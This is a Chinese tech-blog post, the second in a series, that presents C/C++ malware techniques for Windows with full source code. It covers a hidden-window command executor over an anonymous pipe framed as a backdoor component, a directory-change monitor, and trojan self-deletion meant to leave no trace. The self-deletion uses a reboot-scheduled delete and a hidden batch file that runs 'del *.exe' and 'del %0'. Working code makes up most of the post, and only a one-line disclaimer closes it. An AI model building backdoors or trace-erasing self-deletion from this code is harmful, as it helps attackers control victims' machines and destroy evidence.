C/C++恶意代码盘点（二）：后门丨文件监控丨自删除功能-技术圈

恶意代码的分类包括计算机病毒、蠕虫、木马、后门、Rootkit、流氓软件、间谍软件、广告软件、僵尸(bot) 、Exploit等等，有些技术经常用到，有的也是必然用到。

昨天咱们分享了一部分，那么今天我们就分享其他一些技术，主要包括：后门、文件监控、文件自动删除等。

后门

后门常以套件的形式存在，用于将受害者信息发送给攻击者或者传输恶意可执行程序（下载器），最常用的功能是接收攻击端传送过来的命令，执行某些操作。

Windows系统中有很多WIN32 API可以执行CMD命令，例如system Winexe CreateProcess等。这里介绍通过匿名管道实现远程CMD。

具体过程

1、初始化匿名管道的SECURITY_ATTRIBUTES结构体，调用CreatePipe创建匿名管道，获取管道数据读取句柄和写入句柄。

2、初始化STARTUPINFO结构体，隐藏进程窗口，并把管道数据写入句柄赋值给新进程控制台窗口的缓存句柄。

3、调用CreateProcess函数创建进程，执行CMD命令并调用WaitForSingleObject等待命令执行完。

4、调用ReadFile根据匿名管道的数据读取句柄从匿名管道的缓冲区中读取数据。

5、关闭句柄，释放资源。

源代码实现：

#include "stdafx.h"#include "PipeCmd.h"

void ShowError(char *pszText){    char szErr[MAX_PATH] = {0};    ::wsprintf(szErr, "%s Error[%d]\n", pszText, ::GetLastError());    ::MessageBox(NULL, szErr, "ERROR", MB_OK);}

// 执行 cmd 命令, 并获取执行结果数据BOOL PipeCmd(char *pszCmd, char *pszResultBuffer, DWORD dwResultBufferSize){    HANDLE hReadPipe = NULL;    HANDLE hWritePipe = NULL;    SECURITY_ATTRIBUTES securityAttributes = {0};    BOOL bRet = FALSE;    STARTUPINFO si = {0};    PROCESS_INFORMATION pi = {0};
    // 设定管道的安全属性    securityAttributes.bInheritHandle = TRUE;    securityAttributes.nLength = sizeof(securityAttributes);    securityAttributes.lpSecurityDescriptor = NULL;    // 创建匿名管道    bRet = ::CreatePipe(&hReadPipe, &hWritePipe, &securityAttributes, 0);    if (FALSE == bRet)    {        ShowError("CreatePipe");        return FALSE;    }    // 设置新进程参数    si.cb = sizeof(si);    si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;    si.wShowWindow = SW_HIDE;    si.hStdError = hWritePipe;    si.hStdOutput = hWritePipe;    // 创建新进程执行命令, 将执行结果写入匿名管道中    bRet = ::CreateProcess(NULL, pszCmd, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);    if (FALSE == bRet)    {        ShowError("CreateProcess");    }    // 等待命令执行结束    ::WaitForSingleObject(pi.hThread, INFINITE);    ::WaitForSingleObject(pi.hProcess, INFINITE);    // 从匿名管道中读取结果到输出缓冲区    ::RtlZeroMemory(pszResultBuffer, dwResultBufferSize);    ::ReadFile(hReadPipe, pszResultBuffer, dwResultBufferSize, NULL, NULL);    // 关闭句柄, 释放内存    ::CloseHandle(pi.hThread);    ::CloseHandle(pi.hProcess);    ::CloseHandle(hWritePipe);    ::CloseHandle(hReadPipe);
    return TRUE;}

文件监控

全局钩子可以实现系统监控，Windows提供了一个文件监控接口函数ReadDirectoryChangesW该函数可以对计算机上所有文件操作进行监控。在调用。

ReadDirectoryChangesW设置监控过滤条件之前，需要通过CreateFile函数打开监控目录，获取监控目录的句柄，之后才能调用ReadDirectoryChangesW函数设置监控过滤条件并阻塞，直到有满足监控过滤条件的操作，ReadDirectoryChangesW才会返回监控数据继续往下执行。

具体过程

C语言资源汇总

1、打开目录，获取文件句柄，调用CreateFile获取文件句柄，文件句柄必须要有FILE_LIST_DIRECTORY权限。

2、调用ReadDirectoryChangesW设置目录监控。

3、判断文件操作类型，只要有满足过滤条件的文件操作，ReadDirectoryChangesW函数会立马返回信息，并将其返回到输出缓冲区中，而且返回数据是按结构体FILE_NOTIFY_INFORMATION返回的。

调用一次ReadDirectoryChangesW函数只会监控一次，要想实现持续监控，则需要程序循环调用ReadDirectoryChangesW函数来设置监控并获取监控数据，由于持续的目录监控需要不停循环调用ReadDirectoryChangesW函数进行设置监控和获取监控数据，所以如果把这段代码放在主线程中则会导致程序阻塞，为了解决主线程阻塞的问题，可以创建一个文件监控子线程，把文件监控的实现代码放到子线程中。

源代码实现：

#include "stdafx.h"#include "MonitorFile.h"

void ShowError(char *pszText){    char szErr[MAX_PATH] = { 0 };    ::wsprintf(szErr, "%s Error[%d]\n", pszText, ::GetLastError());    ::MessageBox(NULL, szErr, "ERROR", MB_OK | MB_ICONERROR);}

// 宽字节字符串转多字节字符串void W2C(wchar_t *pwszSrc, int iSrcLen, char *pszDest, int iDestLen){    ::RtlZeroMemory(pszDest, iDestLen);    // 宽字节字符串转多字节字符串    ::WideCharToMultiByte(CP_ACP,        0,        pwszSrc,        (iSrcLen / 2),        pszDest,        iDestLen,        NULL,        NULL);}

// 目录监控多线程UINT MonitorFileThreadProc(LPVOID lpVoid){    char *pszDirectory = (char *)lpVoid;
    // 打开目录, 获取文件句柄    HANDLE hDirectory = ::CreateFile(pszDirectory, FILE_LIST_DIRECTORY,        FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING,        FILE_FLAG_BACKUP_SEMANTICS, NULL);    if (INVALID_HANDLE_VALUE == hDirectory)    {        ShowError("CreateFile");        return 1;    }
    char szTemp[MAX_PATH] = { 0 };    BOOL bRet = FALSE;    DWORD dwRet = 0;    DWORD dwBufferSize = 2048;
    // 申请一个足够大的缓冲区    BYTE *pBuf = new BYTE[dwBufferSize];    if (NULL == pBuf)    {        ShowError("new");        return 2;    }    FILE_NOTIFY_INFORMATION *pFileNotifyInfo = (FILE_NOTIFY_INFORMATION *)pBuf;
    // 开始循环设置监控    do    {        ::RtlZeroMemory(pFileNotifyInfo, dwBufferSize);        // 设置监控目录        bRet = ::ReadDirectoryChangesW(hDirectory,            pFileNotifyInfo,            dwBufferSize,            TRUE,            FILE_NOTIFY_CHANGE_FILE_NAME |            // 修改文件名            FILE_NOTIFY_CHANGE_ATTRIBUTES |            // 修改文件属性            FILE_NOTIFY_CHANGE_LAST_WRITE,            // 最后一次写入            &dwRet,            NULL,            NULL);        if (FALSE == bRet)        {            ShowError("ReadDirectoryChangesW");            break;        }        // 将宽字符转换成窄字符        W2C((wchar_t *)(&pFileNotifyInfo->FileName), pFileNotifyInfo->FileNameLength, szTemp, MAX_PATH);        // 判断操作类型并显示        switch (pFileNotifyInfo->Action)        {        case FILE_ACTION_ADDED:        {            // 新增文件            printf("[File Added Action]%s\n", szTemp);            break;        }        default:        {            break;        }        }

    } while (bRet);    // 关闭句柄, 释放内存    ::CloseHandle(hDirectory);    delete[] pBuf;    pBuf = NULL;
    return 0;}

// 创建目录监控多线程void MonitorFile(char *pszDirectory){    // 创建文件监控多线程    ::CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)MonitorFileThreadProc, pszDirectory, 0, NULL);}

C语言资源汇总

自删除

自删除功能对病毒木马来说同样至关重要，它通常在完成目标任务之后删除自身，不留下任何蛛丝马迹，自删除的方法有很多种，常见的有利用MoveFileEx重启删除和利用批处理删除两种方式。

（1）MoveFileEx重启删除

MOVEFILE_DELAY_UNTIL_REBOOT这个标志只能由拥有管理员权限的程序或者拥有本地系统权限的程序使用，而且这个标志不能MOVEFILE_COPY_ALLOWED一起使用，并且，删除文件的路径开头需要加上“\?\"前缀。

源代码实现：

#include "stdafx.h"#include 

BOOL RebootDelete(char *pszFileName){    // 重启删除文件    char szTemp[MAX_PATH] = "\\\\?\\";    ::lstrcat(szTemp, pszFileName);    BOOL bRet = ::MoveFileEx(szTemp, NULL, MOVEFILE_DELAY_UNTIL_REBOOT);    return bRet;}

int _tmain(int argc, _TCHAR* argv[]){    if (FALSE == RebootDelete("C:\\Users\\Test\\Desktop\\520.exe"))    {        printf("Set Reboot Delete Error.\n");    }    else    {        printf("Set Reboot Delete OK.\n");    }
    system("pause");    return 0;}

（2）利用批处理命令删除

del %0

批处理命令会将自身批处理文件删除而且不放进回收站。

具体流程

1 构造自删除批处理文件，该批处理文件的功能就是先利用choice或ping命令延迟一定的时间，之后才开始执行删除文件操作，最后执行自删除命令。

2 在程序中创建一个新进程并调用批处理文件，程序在进程创建成功后，立刻退出整个程序。

源代码实现：C语言资源汇总

#include "stdafx.h"#include 

BOOL CreateChoiceBat(char *pszBatFileName){    int iTime = 5;    char szBat[MAX_PATH] = { 0 };
    // 构造批处理内容    /*        @echo off        choice /t 5 /d y /n >nul        del *.exe        del %0    */    ::wsprintf(szBat, "@echo off\nchoice /t %d /d y /n >nul\ndel *.exe\ndel %%0\n", iTime);
    // 生成批处理文件    FILE *fp = NULL;    fopen_s(&fp, pszBatFileName, "w+");    if (NULL == fp)    {        return FALSE;    }    fwrite(szBat, (1 + ::lstrlen(szBat)), 1, fp);    fclose(fp);
    return TRUE;}

BOOL CreatePingBat(char *pszBatFileName){    int iTime = 5;    char szBat[MAX_PATH] = {0};
    // 构造批处理内容    /*        @echo off        ping 127.0.0.1 -n 5        del *.exe        del %0    */    ::wsprintf(szBat, "@echo off\nping 127.0.0.1 -n %d\ndel *.exe\ndel %%0\n", iTime);
    // 生成批处理文件    FILE *fp = NULL;    fopen_s(&fp, pszBatFileName, "w+");    if (NULL == fp)    {        return FALSE;    }    fwrite(szBat, (1 + ::lstrlen(szBat)), 1, fp);    fclose(fp);
    return TRUE;}

BOOL DelSelf(int iType){    BOOL bRet = FALSE;    char szCurrentDirectory[MAX_PATH] = {0};    char szBatFileName[MAX_PATH] = {0};    char szCmd[MAX_PATH] = {0};
    // 获取当前程序所在目录    ::GetModuleFileName(NULL, szCurrentDirectory, MAX_PATH);    char *p = strrchr(szCurrentDirectory, '\\');    p[0] = '\0';    // 构造批处理文件路径    ::wsprintf(szBatFileName, "%s\\temp.bat", szCurrentDirectory);    // 构造调用执行批处理的 CMD 命令行    ::wsprintf(szCmd, "cmd /c call \"%s\"", szBatFileName);
    // 创建自删除的批处理文件    if (0 == iType)    {        // choice 方式        bRet = CreateChoiceBat(szBatFileName);    }    else if (1 == iType)    {        // ping 方式        bRet = CreatePingBat(szBatFileName);    }
    // 创建新的进程, 以隐藏控制台的方式执行批处理    if (bRet)    {        STARTUPINFO si = { 0 };        PROCESS_INFORMATION pi;        si.cb = sizeof(si);        //指定wShowWindow成员有效        si.dwFlags = STARTF_USESHOWWINDOW;           //此成员设为TRUE的话则显示新建进程的主窗口        si.wShowWindow = FALSE;                           BOOL bRet = CreateProcess(            //不在此指定可执行文件的文件名            NULL,               //命令行参数            szCmd,                           //默认进程安全性            NULL,                   //默认进程安全性            NULL,               //指定当前进程内句柄不可以被子进程继承            FALSE,                               //为新进程创建一个新的控制台窗口            CREATE_NEW_CONSOLE,                   //使用本进程的环境变量            NULL,                           //使用本进程的驱动器和目录            NULL,                                           &si,            &pi);        if (bRet)        {            //不使用的句柄最好关掉            CloseHandle(pi.hThread);            CloseHandle(pi.hProcess);
            // 结束进程            exit(0);            ::ExitProcess(NULL);        }    }
    return bRet;}

int _tmain(int argc, _TCHAR* argv[]){    // 程序自删除    BOOL bRet = DelSelf( 0 );    if (FALSE == bRet)    {        printf("Selft Delete Error!\n");    }    else    {        printf("Selft Delete OK!\n");    }
    system("pause");    return 0;}

注：恶意代码的存在不是由于黑客之类的手段，主要还是我们开发过程中很多情况会用到这样的技术，所以大家请利用技术做正确的事情！

版权申明：内容来源网络，版权归原创者所有。除非无法确认，我们都会标明作者及出处，如有侵权烦请告知，我们会立即删除并表示歉意。谢谢!

‧‧‧‧‧‧‧‧‧‧‧‧‧‧‧‧  END  ‧‧‧‧‧‧‧‧‧‧‧‧‧‧‧‧